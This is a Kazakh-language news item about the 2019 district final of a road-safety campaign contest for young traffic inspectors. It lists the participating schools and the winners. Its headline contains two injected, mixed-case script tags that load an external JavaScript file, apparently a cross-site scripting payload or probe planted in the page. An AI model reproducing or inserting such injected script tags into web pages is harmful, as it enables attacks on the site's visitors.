ЖИҚ 2019 аудандық байқаудың финалы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

03.05.2019

2019 жылғы 3 мамыр күні «Арман» Орталығында «Қауіпсіз дөңгелек» атты дәстүрлі Жас Инспекторлардың Қозғалысы үгіт бригадасының аудандық байқауының финалдық кезеңі өтті. Оған қалалық және Бурабай ауданының ауылдық мектептерінің 9 командасы қатысты. Байқаудың мақсаты балаларды жолда жүру ережесін сақтауға және балалардың жол-көлік жарақатының алдын алуға үйрету болып табылады.

Байқауға қатысқандар: Зеленобор МГ, №7 МЛ, №4 ОМ, №3 ОМ, №8 МГ, №9 МГ, №2 ОМ, №6 ОМ, Сатпаев ОМ. Команда құрамында 12 мен 14 жас аралығындағы балалар қатысты.

Аудандық байқаудың финалдық кезеңін өткізу нәтижесінің қорытындысы:

1 орын Зеленобор МГ, 2 орын №7 Мектеп лицейі, 3 орын №9 МГ, сонымен қатар үздік қатысушылар станцияларда белсенді жауап бергендері үшін грамоталармен марапатталды.

Просмотров: 504


Пікір қосу



Деректерді қолтаңбаға қосу